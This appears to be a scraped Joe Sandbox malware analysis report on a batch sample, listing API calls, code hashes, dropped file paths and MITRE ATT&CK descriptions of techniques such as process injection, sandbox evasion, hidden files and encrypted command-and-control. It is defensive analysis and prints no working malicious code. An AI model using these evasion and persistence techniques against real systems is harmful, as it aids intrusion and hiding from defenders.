RtlPcToFileHeader.NTDLL ref: 00000192916291C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000192916287F7), ref: 0000019291629209

Strings

csm, xrefs: 00000192916291F6

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: ea0f61a0825c2f713fde2ac770492c1e305369da6509b86e8deb4b56c319cebf
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 92116D32614B9092EB248F16F414289B7E1F789B88F684628EECD47B65DF3CC551CB00

Function 0000019291621D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019291621D69
HeapAlloc.KERNEL32 ref: 0000019291621D77
GetProcessHeap.KERNEL32 ref: 0000019291621D9C
HeapFree.KERNEL32 ref: 0000019291621DAA

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: d29f7e25db6080f20b667190373a4e7c5aad767c995968ccf72db40605a2aabc
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: FF11C036A05B90A1EE14DB67E81429977B0F788FC4F684428DE4E93726EF38D442C300

Function 0000019291621264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001929162126A
HeapAlloc.KERNEL32 ref: 0000019291621279
GetProcessHeap.KERNEL32 ref: 0000019291621293
HeapAlloc.KERNEL32 ref: 00000192916212A4

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 48cf3d7c59958b70f863b85ab16a84aae97744e3c6331c76518c8e22097e42e3
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 1BE09231A01614AAE7148F63D82838936E1FB8CF0AF54C028C91907351EF7D84DAC741

Function 0000019291621000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019291621006
HeapAlloc.KERNEL32 ref: 0000019291621015
GetProcessHeap.KERNEL32 ref: 0000019291621028
HeapAlloc.KERNEL32 ref: 0000019291621037

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4d2d8fbfc6eae9906d1ef74aa2bfe981601dd8b61b8a00053a5cac77688d4a2d
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: E0E01271A11614ABE7189F63DC1439976E1FB8CF1AF548028C91907311EE7C849AD711

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NhoqAfkhHL.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ijeqlp2.faj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ro1ymda.0dm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqvafjhx.kcg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd0hjjb1.yor.psm1

C:\Windows\$nya-onimai2\$nya-Onimai.bat (copy)

Windows Analysis Report
NhoqAfkhHL.bat

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre